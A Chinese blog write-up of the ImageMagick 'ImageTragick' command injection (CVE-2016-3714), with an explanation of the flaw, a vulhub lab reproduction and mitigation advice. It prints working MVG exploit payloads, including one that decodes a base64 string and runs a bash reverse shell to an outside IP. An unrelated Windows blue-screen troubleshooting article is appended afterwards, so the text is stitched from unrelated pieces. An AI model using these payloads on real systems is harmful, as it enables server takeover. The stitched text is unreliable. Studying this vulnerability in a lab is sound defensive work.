Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞介绍

漏洞名称:Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定级:高危

漏洞描述:ImageMagick 在处理恶意构造的图片文件时,对于文件中的 URL 未经严格过滤,可导致命令注入漏洞。通过命令注入漏洞,黑客可以在服务器上执行任意系统命令,获取服务器权限。

影响范围:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站:https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717,

其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的

参考代码:
https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我们在ImageMagick的默认配置文件里可以看到所有的委托:
/etc/ImageMagick/delegates.xml 漏洞报告中给出的POC是利用了如下的这个委托:

 

它在解析https图片的时候,使用了curl命令将其下载,我们看到%M被直接放在curl的最后一个参数内。

ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

所以我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg,比如下图中包含payload的文件的文件名为vul.gif,而ImageMagick会根据其内容识别为mvg图片),并在https://后面闭合双引号,写入自己要执行的命令:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")’
pop graphic-context

这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞。

漏洞复现

参考链接:
https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

使用vulhub靶场进行复现

进入目录:

启动靶场环境:

docker-compose up -d

访问靶场环境

上传poc,新建一个txt文件,内容为:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

将文件保存为poc.gif

上传poc.gif,点击提交,成功执行:

反弹shell POC:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguODEuMjMyLzg4ODggMD4mMQ== | base64 -d | bash`"||id " )'
pop graphic-context

攻击机进行监听

上传 poc1.gif ,执行成功

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
1.网络安全多个方向学习路线2.全网最全的CTF入门学习资料3.一线大佬实战经验分享笔记4.网安大厂面试题合集5.红蓝对抗实战技术秘籍6.网络安全基础入门、Linux、web安全、渗透测试方面视频

漏洞修复

关于这个漏洞影响ImageMagick 6.9.3-9以前是所有版本,包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以,我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。

现在,我们可以通过如下两个方法来暂时规避漏洞:

  1. 处理图片前,先检查图片的 magic bytes,也就是图片头,如果图片头不是你想要的格式,那么就不调用ImageMagick处理图片。如果你是php用户,可以使用getimagesize函数来检查图片格式,而如果你是wordpress等web应用的使用者,可以暂时卸载ImageMagick,使用php自带的gd库来处理图片。
  2. 使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作:

参考链接

https://www.cnblogs.com/bmjoker/p/9898590.html

https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

https://mp.weixin.qq.com/s/q6jlnlU-hoRkr-vOJUp4LQ

### 解决 DRIVER_IRQL_NOT_LESS_OR_EQUAL 蓝屏错误的方法 DRIVER_IRQL_NOT_LESS_OR_EQUAL 是一种常见的蓝屏错误,通常表明某个驱动程序尝试访问受保护的内存区域。这种问题可能由多种原因引起,包括硬件故障、不兼容的驱动程序或系统文件损坏。 以下是针对该问题的具体解决方案: #### 1. 运行系统诊断工具 运行计算机制造商提供的所有系统诊断软件,特别是用于检测内存问题的工具[^1]。这些工具可以帮助识别是否存在物理内存(RAM)或其他硬件组件的问题。 #### 2. 禁用或移除最近安装的硬件或软件 如果近期安装了新的硬件设备(如 RAM 或适配器),或者更新了某些驱动程序或软件,则建议暂时禁用或卸载它们以排除潜在冲突。可以通过以下方式操作: - **进入设备管理器**:按 `Win + X` 并选择“设备管理器”。 - 找到并右键单击可疑硬件设备,选择“禁用设备”或“卸载设备”。 #### 3. 更新或回滚驱动程序 确保所有驱动程序均为最新版本。对于特定引发问题的 `.sys` 文件(如 ACE GAME.sys),可以尝试将其替换为旧版稳定驱动程序: ```cmd devmgmt.msc ``` 打开设备管理器后定位对应的驱动程序,右键点击并选择“属性”,然后切换至“驱动程序”选项卡,执行“回滚驱动程序”命令。 #### 4. 使用安全模式启动 通过 Windows 安全模式启动系统有助于隔离可能导致问题的应用程序和服务。具体步骤如下: - 启动时反复按下 F8 键直到显示高级引导菜单。 - 选择“带网络的安全模式”以便进一步排查问题。 #### 5. 检查事件查看器日志 Windows 的事件查看器能够提供有关崩溃更详细的记录信息: ```cmd eventvwr.msc ``` 导航至“Windows 日志 -> 系统”,查找带有错误状态的日志条目,重点关注描述部分提到的内容及其关联模块名称。 #### 6. 执行 SFC 和 DISM 工具修复系统文件 利用内置命令扫描并修正受损的操作系统核心文件: ```cmd sfc /scannow DISM.exe /Online /Cleanup-image /Restorehealth ``` 以上措施综合应用可有效减少乃至彻底消除此类 BSOD 故障的发生概率。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值